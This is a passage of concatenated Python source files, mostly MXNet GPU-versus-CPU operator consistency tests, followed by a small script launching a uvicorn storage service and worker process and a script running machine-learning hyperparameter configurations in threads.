psroipooling sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3, output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool') ctx_list = [{'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64, 'deformable_psroipool_trans': np.float64}}, {'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32, 'deformable_psroipool_trans': np.float32}}, {'ctx': mx.gpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16, 'deformable_psroipool_trans': np.float16}}, {'ctx': mx.cpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64, 'deformable_psroipool_trans': np.float64}}, {'ctx': mx.cpu(0), 'deformable_psroipool_data': (1, 18, 14, 
14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32, 'deformable_psroipool_trans': np.float32}}, {'ctx': mx.cpu(0), 'deformable_psroipool_data': (1, 18, 14, 14), 'deformable_psroipool_rois': (2, 5), 'deformable_psroipool_trans': (2, 4, 3, 3), 'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16, 'deformable_psroipool_trans': np.float16}}, ] check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol, grad_req={'deformable_psroipool_data': 'write', 'deformable_psroipool_rois': 'null', 'deformable_psroipool_trans': 'write'}, arg_params=arg_params) @with_seed() @pytest.mark.serial def test_deformable_convolution_with_type(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3} sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv') # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 10, 10), 'deformable_conv_offset': (2, 18, 8, 8), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # test ability to turn off training on bias check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol, grad_req={'deformable_conv_data': 'write', 'deformable_conv_offset': 'write', 'deformable_conv_weight': 'write', 'deformable_conv_bias': 'null'}) @with_seed() def test_deformable_convolution_options(): tol = {np.dtype(np.float32): 1e-1, np.dtype(np.float64): 1e-3} # 2D convolution # since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here # Pad > 0 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 7, 7), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # Stride > 1 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': 
np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # Dilate > 1 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 18, 3, 3), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) # Deformable group > 1 ctx_list = [{'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.gpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}}, {'ctx': mx.cpu(0), 'deformable_conv_data': (2, 2, 7, 7), 'deformable_conv_offset': (2, 36, 5, 5), 'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}}, ] sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv') check_consistency(sym, ctx_list, scale=0.1, rtol=tol, atol=tol) def check_rnn_layer(layer): layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)]) with mx.gpu(0): x = mx.nd.ones((10, 16, 30)) states = layer.begin_state(16) go, gs = layer(x, states) with mx.cpu(0): x = mx.nd.ones((10, 16, 30)) states = layer.begin_state(16) co, cs = layer(x, states) # atol of 1e-6 required, as exposed by seed 2124685726 assert_almost_equal(go, co, rtol=1e-2, atol=1e-6) for g, c in zip(gs, cs): assert_almost_equal(g, c, rtol=1e-2, atol=1e-6) def check_rnn_layer_w_rand_inputs(layer): layer.initialize(ctx=[mx.cpu(0), mx.gpu(0)]) x = mx.nd.uniform(shape=(10, 16, 30)) with mx.gpu(0): x = x.copyto(mx.gpu(0)) states = layer.begin_state(16) go, gs = layer(x, states) with mx.cpu(0): x = x.copyto(mx.cpu(0)) states = layer.begin_state(16) co, cs = layer(x, states) assert_almost_equal(go, co, rtol=1e-2, atol=1e-6) for g, c in zip(gs, cs): assert_almost_equal(g, c, 
rtol=1e-2, atol=1e-6) @with_seed() @pytest.mark.serial def test_sequence_reverse(): check_sequence_reverse(mx.gpu(0)) @with_seed() @pytest.mark.serial def test_autograd_save_memory(): x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0)) x.attach_grad() with mx.autograd.record(): for i in range(200): x = x + 1 x.wait_to_read() x.backward() @with_seed() @pytest.mark.serial def test_cuda_rtc(): source = r''' extern "C" __global__ void axpy(const float *x, float *y, float alpha) { int i = threadIdx.x + blockIdx.x * blockDim.x; y[i] += alpha * x[i]; } extern "C" __global__ void saxpy(const float *x, float *y, float alpha) { extern __shared__ float smem[]; int i = threadIdx.x + blockIdx.x * blockDim.x; smem[threadIdx.x] = x[i]; y[i] += alpha * smem[threadIdx.x]; } ''' module = mx.rtc.CudaModule(source) axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha") x = mx.nd.ones((10,), ctx=mx.gpu(0)) y = mx.nd.zeros((10,), ctx=mx.gpu(0)) axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1)) assert (y.asnumpy() == 3).all() saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha") saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10) assert (y.asnumpy() == 7).all() saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5) assert (y.asnumpy() == 12).all() @with_seed() @pytest.mark.serial def test_cross_device_autograd(): x = mx.nd.random.uniform(shape=(10,)) x.attach_grad() with mx.autograd.record(): y = mx.nd.tanh(x) y = y.copyto(mx.gpu(0)) y = mx.nd.tanh(y) y = y.copyto(mx.cpu(0)) y = mx.nd.tanh(y) y = y.copyto(mx.gpu(0)) y = y.copyto(mx.gpu(0)) y.backward() dx = x.grad.copy() x.grad[:] = 0 with mx.autograd.record(): y = x for i in range(3): y = mx.nd.tanh(y) y.backward() assert_almost_equal(dx, x.grad) @with_seed() @pytest.mark.serial def test_multi_proposal_op(): # paramters feature_stride = 16 scales = (8, 16, 32) ratios = (0.5, 1, 2) rpn_pre_nms_top_n = 12000 rpn_post_nms_top_n = 2000 rpn_min_size = feature_stride feat_len = (1000 + 15) // 16 H, W = feat_len, feat_len num_anchors = len(scales) * len(ratios) count_anchors = H * W * num_anchors def get_new_data(batch_size, ctx): ''' cls_prob: (batch_size, 2 * num_anchors, H, W) bbox_pred: (batch_size, 4 * num_anchors, H, W) im_info: (batch_size, 3) ''' dtype = np.float32 cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx) bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx) im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx) cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)] np.random.shuffle(cls) cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape) bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx) for i in range(batch_size): im_size = np.random.randint(600, feat_len * feature_stride, size = (2,)) im_scale = np.random.randint(80, 100) / 100.0 im_info[i, :] = [im_size[0], im_size[1], im_scale] return cls_prob, bbox_pred, im_info def check_proposal_consistency(op, batch_size, with_nms=False): ''' op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal ''' cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0)) rois_cpu, score_cpu = op( cls_prob = cls_prob, bbox_pred = bbox_pred, im_info = im_info, feature_stride = feature_stride, scales = scales, ratios = ratios, rpn_pre_nms_top_n = rpn_pre_nms_top_n, rpn_post_nms_top_n = rpn_post_nms_top_n, threshold = 0.7 if with_nms else 1.0, rpn_min_size = 
rpn_min_size, output_score = True) gpu_ctx = mx.gpu(0) # copy data to gpu from cpu cls_prob_gpu = cls_prob.as_in_context(gpu_ctx) bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx) im_info_gpu = im_info.as_in_context(gpu_ctx) rois_gpu, score_gpu = op( cls_prob = cls_prob_gpu, bbox_pred = bbox_pred_gpu, im_info = im_info_gpu, feature_stride = feature_stride, scales = scales, ratios = ratios, rpn_pre_nms_top_n = rpn_pre_nms_top_n, rpn_post_nms_top_n = rpn_post_nms_top_n, threshold = 0.7 if with_nms else 1.0, rpn_min_size = rpn_min_size, output_score = True) rois_cpu_np = rois_cpu.asnumpy() rois_gpu_np = rois_gpu.asnumpy() score_cpu_np = score_cpu.asnumpy() score_gpu_np = score_gpu.asnumpy() if not with_nms: assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3) assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3) else: # no 100% gurantee with nms assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10) assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40) check_proposal_consistency(mx.nd.contrib.Proposal, 1) check_proposal_consistency(mx.nd.contrib.MultiProposal, 5) check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True) check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True) # The following 2 functions launch 0-thread kernels, an error that should be caught and signaled. def kernel_error_check_imperative(): with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'): with mx.np_shape(active=True): a = mx.nd.array([1,2,3],ctx=mx.gpu(0)) b = mx.nd.array([],ctx=mx.gpu(0)) c = (a / b).asnumpy() def kernel_error_check_symbolic(): with environment('MXNET_ENGINE_TYPE', 'NaiveEngine'): with mx.np_shape(active=True): a = mx.sym.Variable('a') b = mx.sym.Variable('b') c = a / b f = c.bind(mx.gpu(0), {'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)), 'b':mx.nd.array([],ctx=mx.gpu(0))}) f.forward() g = f.outputs[0].asnumpy() @pytest.mark.serial def test_kernel_error_checking(): # Running tests that may throw exceptions out of worker threads will stop CI testing # if not run in a separate process (with its own address space for CUDA compatibility). try: mpctx = mp.get_context('spawn') except: print('SKIP: python%s.%s lacks the required process fork-exec support ... ' % sys.version_info[0:2], file=sys.stderr, end='') else: with discard_stderr(): for f in [kernel_error_check_imperative, kernel_error_check_symbolic]: p = mpctx.Process(target=f) p.start() p.join() assert p.exitcode != 0,\ "Expected a synchronous kernel error from %s(), none seen." 
% f.__name__ def test_incorrect_gpu(): # Try setting dev_id to a really big number pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001)) @with_seed() def test_batchnorm_backwards_notrain(): for ctx in [mx.cpu(0), mx.gpu(0)]: for cudnn_o in [False, True]: B,C,H,W = 4,3,2,2 x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx) gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx) beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx) mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx) std = mx.nd.random.normal(shape=(C)).as_in_context(ctx) x.attach_grad() with autograd.record(False): y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(), fix_gamma=False, cudnn_off=cudnn_o) loss=y.square().sum() loss.backward(train_mode=False) @with_seed() def test_create_sparse_ndarray_gpu_to_cpu(): dim0 = 10 dim1 = 5 densities = [0, 0.5, 1] for density in densities: shape = rand_shape_2d(dim0, dim1) matrix = rand_ndarray(shape, 'row_sparse', density) data = matrix.data indices = matrix.indices rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu()) assert rsp_created.stype == 'row_sparse' assert same(rsp_created.data.asnumpy(), data.asnumpy()) assert same(rsp_created.indices.asnumpy(), indices.asnumpy()) rsp_copy = mx.nd.array(rsp_created) assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy())) @with_seed() def test_softmax_activation(): gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.], [2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0)) cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.], [2., -.4, 7., 3., 0.2]], ctx=mx.cpu()) cpu_a.attach_grad() gpu_a.attach_grad() with mx.autograd.record(): gpu_y = mx.nd.SoftmaxActivation(data = gpu_a) cpu_y = mx.nd.SoftmaxActivation(data = cpu_a) assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3) gpu_y.backward() cpu_y.backward() assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3) @with_seed() @pytest.mark.serial @pytest.mark.serial def test_bilinear_sampler_versions(): data = mx.sym.Variable('data') grid = mx.sym.Variable('grid') sym1 = mx.sym.BilinearSampler(data=data, grid=grid) sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True) sym3 = mx.sym.BilinearSampler(data=data, grid=grid) test_cases = [[(1,3,15,16),(1,2,10,10)], [(1,6,7,16),(1,2,10,4)], [(1,7,3,16),(1,2,8,11)], [(1,9,50,50),(1,2,50,50)]] for item in test_cases: data_shape, grid_shape = item # kWriteTo exe_cpu = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write') exe_gpu = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write') exe_cudnn = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write') exe_list = [exe_cpu, exe_gpu, exe_cudnn] ref_idx = 0 test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32) test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32) for exe in exe_list: exe.arg_dict['data'][:] = test_data exe.arg_dict['grid'][:] = test_grid exe.forward(is_train=True) mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5) out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32) for exe in exe_list: exe.backward(mx.nd.array(out_grad)) assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5) assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5) data_grad = 
exe_list[ref_idx].grad_dict['data'].asnumpy() grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy() # kAddTo exe_cpu_addto = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add') exe_gpu_addto = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add') exe_cudnn_addto = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add') exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto] data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32) grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32) for exe in exe_list: exe.arg_dict['data'][:] = test_data exe.arg_dict['grid'][:] = test_grid exe.grad_dict['data'][:] = data_initial_grad exe.grad_dict['grid'][:] = grid_initial_grad exe.forward(is_train=True) exe.backward(mx.nd.array(out_grad)) assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5) assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5) assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5) assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5) for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]: # Mixture of kWriteTo and kNullOp exe_cpu_mix = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict) exe_gpu_mix = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict) exe_cudnn_mix = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict) exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix] for exe in exe_list: exe.arg_dict['data'][:] = test_data exe.arg_dict['grid'][:] = test_grid exe.forward(is_train=True) exe.backward(mx.nd.array(out_grad)) if req_dict['data'] is 'write': assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5) if req_dict['grid'] is 'write': assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5) # isolated execution bulking test function to be invoked with different env var settings def _test_bulking_in_process(seed, time_per_iteration): data_shape = (10,) num_ops = 1000 num_iterations = 20 ctx = default_context() # build symbol X = mx.sym.Variable('X') sym = mx.sym.flip(X, axis=0) for _ in range(num_ops-1): sym = mx.sym.flip(sym, axis=0) x = mx.ndarray.zeros(data_shape) dx = mx.ndarray.zeros(data_shape) dy = mx.ndarray.ones(data_shape) exe = sym._bind(ctx=ctx, args=[x], args_grad = {'X':dx}) # time a number of forward() and backward() executions after some warm-up iterations warmups = 1 for i in range(num_iterations+warmups): if i == warmups: start = time.time() exe.forward(is_train=True) exe.backward(dy) dx.wait_to_read() time_per_iteration.value = (time.time() - start) / num_iterations @with_seed() @pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517') def test_bulking_operator_gpu(): _test_bulking(_test_bulking_in_process) @pytest.mark.skip(reason='skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970') def test_bulking(): # test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training) test_cases = [(0,0,True), 
(1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)] times = {} times_str = '' for seg_sizes in test_cases: # Create shared variable to return measured time from test process time_per_iteration = mp.Manager().Value('d', 0.0) if not run_in_spawned_process(_test_bulking_in_process, {'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : str(seg_sizes[0]), 'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : str(seg_sizes[1]), 'MXNET_EXEC_BULK_EXEC_TRAIN' : str(seg_sizes[2])}, time_per_iteration): # skip test since the python version can't run it properly. Warning msg was logged. return times[seg_sizes] = time_per_iteration.value times_str += \ '\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format( seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes]) fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)]) slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)]) fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)]) fully_bulked_time = times[(15,15,True)] print(times_str) # Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same, # slower than both half-bulked times[0,15,True] and times[15,0,True] assert slowest_half_bulked_time < fastest_non_bulked_time, \ 'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \ .format(slowest_half_bulked_time - fastest_non_bulked_time, times_str) # The fully bulked times[15,15,True] should be faster than both half-bulked runs assert fully_bulked_time < fastest_half_bulked_time, \ 'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \ .format(fully_bulked_time - fastest_half_bulked_time, times_str) @with_seed() @pytest.mark.serial def test_allclose_function_gpu(): allclose_function([mx.cpu(), mx.gpu(0)]) def test_context_num_gpus(): # Test that num_gpus reports at least one GPU, as the test is run on a GPU host. 
    assert mx.context.num_gpus() > 0


def math_log(shape, dtype, check_value):
    np_x = np.random.rand(*tuple(shape))
    x = mx.nd.array(np_x, dtype=dtype)
    y = mx.nd.log(data=x)
    if check_value:
        x_ = x.as_in_context(mx.cpu())
        y_ = mx.nd.log(data=x_)
        assert_almost_equal(y.asnumpy(), y_.asnumpy())


def math_erf(shape, dtype, check_value):
    np_x = np.random.rand(*tuple(shape))
    x = mx.nd.array(np_x, dtype=dtype)
    y = mx.nd.erf(data=x)
    if check_value:
        x_ = x.as_in_context(mx.cpu())
        y_ = mx.nd.erf(data=x_)
        assert_almost_equal(y.asnumpy(), y_.asnumpy())


def math_square(shape, dtype, check_value):
    np_x = np.random.rand(*tuple(shape))
    x = mx.nd.array(np_x, dtype=dtype)
    y = mx.nd.square(data=x)
    if check_value:
        x_ = x.as_in_context(mx.cpu())
        y_ = mx.nd.square(data=x_)
        assert_almost_equal(y.asnumpy(), y_.asnumpy())


def run_math(op, shape, dtype="float32", check_value=True):
    run_num = 10
    for i in range(run_num):
        if op == 'log':
            math_log(shape=shape, dtype=dtype, check_value=check_value)
        elif op == 'erf':
            math_erf(shape=shape, dtype=dtype, check_value=check_value)
        elif op == 'square':
            math_square(shape=shape, dtype=dtype, check_value=check_value)


@with_seed()
@pytest.mark.serial
def test_math():
    ops = ['log', 'erf', 'square']
    check_value = True
    shape_lst = [[1000], [100, 1000], [10, 100, 100], [10, 100, 100, 100]]
    dtypes = ["float32", "float64"]
    for shape in shape_lst:
        for dtype in dtypes:
            for op in ops:
                run_math(op, shape, dtype, check_value=check_value)


@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
    dtypes = [np.float16, np.float32, np.float64]
    for t in dtypes:
        x = mx.sym.Variable('x', dtype=t)
        y = mx.sym.reshape(x, shape=(0, 0, -1))
        z = mx.sym.contrib.arange_like(y, axis=-1)
        mod = z._simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
        mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
        out = mod.forward(is_train=False)
        for v in out:
            assert v.dtype == t
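
# --- Added sketch (not part of the original test file): the consistency tests
# --- above compare CPU and GPU outputs with a tolerance chosen per dtype. The
# --- two names below are hypothetical, numpy-only illustrations of that
# --- pattern, not MXNet APIs; they are defined here but never called.
_dtype_tol_sketch = {np.dtype(np.float16): 1e-1,
                     np.dtype(np.float32): 1e-3,
                     np.dtype(np.float64): 1e-5}


def _outputs_consistent_sketch(reference, candidate):
    """Return True if `candidate` matches `reference` within the reference dtype's tolerance."""
    tol = _dtype_tol_sketch[np.dtype(reference.dtype)]
    return np.allclose(candidate, reference, rtol=tol, atol=tol)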
run.py
""" This is the main script that starts everything. """ from multiprocessing import Process import time import uvicorn from modules.worker.main import Worker from settings import DATASTORE_APP_ADDRESS def run_worker_app_process(): """ start the worker application as a process """ worker_app_proc = Process(target=Worker) worker_app_proc.start() return worker_app_proc def run_storage_app(address, port): """ start the storage application with uvicorn """ uvicorn.run("modules.datastore.main:app", host=address, port=port, log_level="debug") # TODO critical log level in production maybe def run_storage_app_process(address, port): """ run storage app as a process """ storage_app_proc = Process(target=run_storage_app, args=(address, port)) storage_app_proc.start() return storage_app_proc if __name__ == "__main__": run_storage_app_process(*DATASTORE_APP_ADDRESS) run_worker_app_process() while True: time.sleep(10)
index.py
from load_dataset import load_dataset
from params import get_params, get_possible_configurations
import traceback, os
import tux
from threading import Thread, BoundedSemaphore

params, hyperparams_list = get_params()
configs = get_possible_configurations(hyperparams_list)
df = load_dataset(params["nb_yes"])
params["dataset"] = df
params["semaphore"] = None

if params["algo"] != "rf":
    # Cap the number of concurrent runs at n_jobs (or the number of CPUs).
    limit = os.sysconf('SC_NPROCESSORS_ONLN')
    if "n_jobs" in params["hyperparams"]:
        limit = params["hyperparams"]["n_jobs"]
        del params["hyperparams"]["n_jobs"]
    params["semaphore"] = BoundedSemaphore(limit)

list_ml = []
if len(configs) > 0:
    for config in configs:
        for k, v in config.items():
            params["hyperparams"][k] = v
        try:
            ml = tux.TuxML(**params)
        except Exception as e:
            print(traceback.format_exc())
            print(e)
            continue  # skip this configuration if construction failed
        if params["semaphore"] is None:
            try:
                ml.start()
            except Exception as e:
                print(traceback.format_exc())
                print(e)
                print("Fails")
        else:
            list_ml.append(Thread(target=ml.start))
    for i in list_ml:
        i.start()
    for i in list_ml:
        i.join()
else:
    print("Starting")
    try:
        ml = tux.TuxML(**params)
        ml.start()
    except Exception as e:
        print(traceback.format_exc())
        print(e)
        print("Fails")
print("End")
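index.py hands the BoundedSemaphore to tux.TuxML without showing how it is consumed; a minimal sketch of the conventional acquire/release pattern, assuming each run wraps its work in the semaphore so at most `limit` runs execute at once (the `work` callable is a placeholder):

def run_bounded(semaphore, work):
    # Hypothetical worker body: the context manager acquires a slot before
    # running and releases it afterwards, capping concurrency at the limit
    # the semaphore was created with.
    with semaphore:
        work()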
core.py
